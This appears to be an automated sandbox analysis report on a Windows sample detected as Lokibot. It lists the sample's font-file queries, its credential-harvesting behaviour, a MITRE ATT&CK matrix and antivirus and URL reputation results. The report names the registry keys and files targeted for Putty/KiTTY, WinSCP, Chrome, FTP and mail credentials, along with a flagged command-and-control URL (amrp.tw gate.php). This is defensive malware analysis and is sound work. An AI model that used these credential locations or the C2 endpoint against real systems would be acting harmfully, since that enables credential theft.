                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00406069 GetUserNameW,5_2_00406069
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FJbeidnZOF.exe PID: 5472, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FJbeidnZOF.exe PID: 5392, type: MEMORY
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: PopPassword5_2_0040D069
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: SmtpPassword5_2_0040D069
                Source: Yara matchFile source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FJbeidnZOF.exe PID: 5472, type: MEMORY
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter2Path InterceptionAccess Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol213SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                FJbeidnZOF.exe22%VirustotalBrowse
                FJbeidnZOF.exe28%ReversingLabsWin32.Trojan.AgentTesla
                FJbeidnZOF.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                1.2.FJbeidnZOF.exe.37167b0.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                5.2.FJbeidnZOF.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                amrp.tw20%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.carterandcone.comn-u0%URL Reputationsafe
                http://www.carterandcone.comn-u0%URL Reputationsafe
                http://www.carterandcone.comn-u0%URL Reputationsafe
                http://www.carterandcone.comn-u0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://amrp.tw/kayo/gate.php20%VirustotalBrowse
                http://amrp.tw/kayo/gate.php100%Avira URL Cloudmalware
                http://www.tiro.comF0%Avira URL Cloudsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/~0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/~0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/~0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/~0%URL Reputationsafe
                http://www.imztinoz.pw/TM/15.bat0%Avira URL Cloudsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
